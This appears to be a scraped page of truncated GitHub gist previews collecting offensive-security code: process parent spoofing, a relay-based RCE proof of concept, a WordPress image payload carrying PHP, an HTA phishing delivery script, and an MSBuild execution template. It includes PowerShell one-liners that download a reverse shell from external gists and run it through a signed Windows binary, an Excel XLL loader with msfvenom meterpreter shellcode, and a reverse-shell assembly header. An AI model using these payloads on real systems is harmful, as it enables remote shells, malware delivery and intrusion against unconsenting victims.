This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* x86-64-w64-mingw32-gcc process_spoof.c -o spoof.exe */ | |
/* spoof.exe explorer.exe calc.exe */ | |
#include <windows.h> | |
#include <tlhelp32.h> | |
#define PROC_THREAD_ATTRIBUTE_PARENT_PROCESS 0x00020000 | |
typedef struct _STARTUPINFOEX { | |
STARTUPINFO StartupInfo; | |
LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html | |
# this is a rough PoC | |
# requirements for RCE: | |
# - the attacker needs to either have or create an object with a service principal name | |
# - the MSSQL server has to be running under the context of System/Network Service/a virtual account | |
# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts) | |
# - NTLM has to be in use |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var wpnonce = ''; | |
var ajaxnonce = ''; | |
var wp_attached_file = ''; | |
var imgurl = ''; | |
var postajaxdata = ''; | |
var post_id = 0; | |
var cmd = '<?php phpinfo();/*'; | |
var cmdlen = cmd.length | |
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9'; | |
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
64bit: | |
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell | |
32bit: | |
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsof |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; ================================================= | |
; Password protected x64 TCP Reverse Shell | |
; Author: Alan Vivona | |
; ================================================= | |
global _start | |
; Syscall numbers | |
syscalls.socket equ 0x29 | |
syscalls.bind equ 0x31 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//@author Sergi Granell | |
//@category _NEW_ | |
//@keybinding | |
//@menupath | |
//@toolbar | |
/* | |
* This script depends on the yamlbeans library. | |
* Download the JAR from https://github.com/EsotericSoftware/yamlbeans/releases | |
* and add the path to Ghidra's "Edit" -> "Plugin Path..." configuration. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Compile with: cl.exe x86_meterpreter_reverse_http.c /LD /o x86_meterpreter_reverse_http.xll | |
#include <Windows.h> | |
__declspec(dllexport) void __cdecl xlAutoOpen(void); | |
DWORD WINAPI ThreadFunction(LPVOID lpParameter) | |
{ | |
// Payload obtained via "msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f c" | |
unsigned char b[] = | |
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta | |
To change your server, simply find and replace 192.168.1.1 with your server in the code. | |
#> | |
<# | |
Moving Credtis for CACTUSTORCH HERE | |
I was in escape sequcence hell ;-) | |
' ( ) ( ) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Tracking cursor position in real-time without JavaScript | |
// Demo: https://twitter.com/davywtf/status/1124146339259002881 | |
package main | |
import ( | |
"fmt" | |
"net/http" | |
"strings" | |
) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" > | |
<Target Name="Hello" > | |
<!-- Call ANY .NET API --> | |
<!-- | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause | |